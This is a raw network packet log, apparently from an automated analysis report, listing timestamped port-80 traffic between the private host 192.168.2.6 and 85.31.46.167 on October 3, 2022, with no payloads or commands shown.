Oct 3, 2022 17:42:20.699259043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699281931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699282885 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699301004 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699317932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699318886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699337006 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699353933 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699354887 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699374914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699377060 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699392080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699397087 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699410915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699426889 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699429989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699449062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699450970 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699466944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699480057 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699486017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699503899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699521065 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699523926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699538946 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699556112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699562073 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699573994 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699588060 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699594975 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699614048 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699623108 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699631929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699650049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699657917 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699667931 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699680090 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699686050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699703932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699714899 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699722052 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699738979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699750900 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699758053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699774981 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699776888 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699795961 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699809074 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699815035 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699834108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699847937 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699851990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699872017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699872017 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699889898 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699891090 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699908018 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699925900 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699925900 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699945927 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699959040 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699964046 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699989080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699992895 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.700015068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.700016022 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.700038910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.700050116 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.700071096 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.700092077 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.723813057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.723845959 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.723948002 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727106094 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727142096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727164984 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727189064 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727200985 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727210999 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727243900 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727255106 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727267981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727284908 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727291107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727318048 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727320910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727344036 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727346897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727368116 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727370977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727391958 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727395058 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727415085 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727417946 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727438927 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727442026 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727458000 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727466106 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727482080 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727488995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727508068 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727513075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727531910 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727538109 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727552891 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727561951 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727577925 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727583885 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727607012 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727607965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727628946 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727631092 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727653027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727655888 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727675915 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727679968 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727701902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727704048 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727725029 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727726936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727751017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727751017 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727772951 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727788925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727796078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727797985 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727807045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727828026 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727829933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727853060 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727853060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727883101 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727890015 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727895021 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727917910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727920055 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727941990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727957010 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.727963924 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727987051 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.727993011 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728009939 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728030920 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728034019 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728058100 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728064060 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728080988 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728101969 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728110075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728133917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728136063 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728157043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728171110 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728182077 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728204966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728205919 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728228092 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728250027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728250980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728275061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728283882 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728297949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728321075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728321075 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728343010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728354931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728365898 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728388071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728395939 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728410959 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728432894 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728434086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728457928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728457928 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728482962 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728496075 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728506088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728528976 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728530884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728552103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728569031 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728574038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728598118 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728604078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728620052 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728641987 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728642941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728665113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728679895 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728688002 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728709936 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728710890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728734016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728750944 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728756905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728779078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728785992 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728802919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728825092 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728827000 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728847980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728863955 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728872061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728893042 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728895903 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728921890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728924990 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728935957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728950977 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728957891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.728979111 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.728986025 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729010105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729017973 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729034901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729048967 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729058981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729082108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729083061 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729105949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729129076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729141951 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729151011 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729175091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729177952 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729197979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729199886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729222059 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729240894 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729243994 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729266882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729274035 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729290009 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729311943 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729315042 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729335070 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729350090 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729358912 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729377031 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729383945 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729408979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729412079 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729433060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729434967 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729456902 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729458094 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729481936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729485035 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729505062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729507923 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729530096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729532003 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729554892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729557037 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729578972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729579926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729604006 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729604959 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729628086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729629040 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729650974 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729652882 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729676008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729676008 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729700089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729701996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729723930 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729726076 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729748964 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.729749918 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729773045 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.729799032 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.750989914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.751017094 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.751140118 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.756854057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.756870031 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.756917000 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.756946087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.756947041 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.756969929 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.756979942 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757006884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757013083 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757030010 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757045984 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757070065 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757078886 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757091999 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757112980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757124901 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757143021 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757155895 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757173061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757188082 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757214069 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757227898 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757244110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757257938 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757277012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757289886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757306099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757322073 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757339001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757353067 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757368088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757384062 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757397890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757414103 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757427931 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757446051 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757457972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757476091 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757488966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757507086 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757519007 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757534027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757549047 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757565022 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757580042 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757595062 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757611036 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757627964 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757642984 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757658005 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757673979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757689953 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757703066 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757718086 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757735014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757747889 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757764101 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757776976 CEST	49711	80	192.168.2.6	85.31.46.167
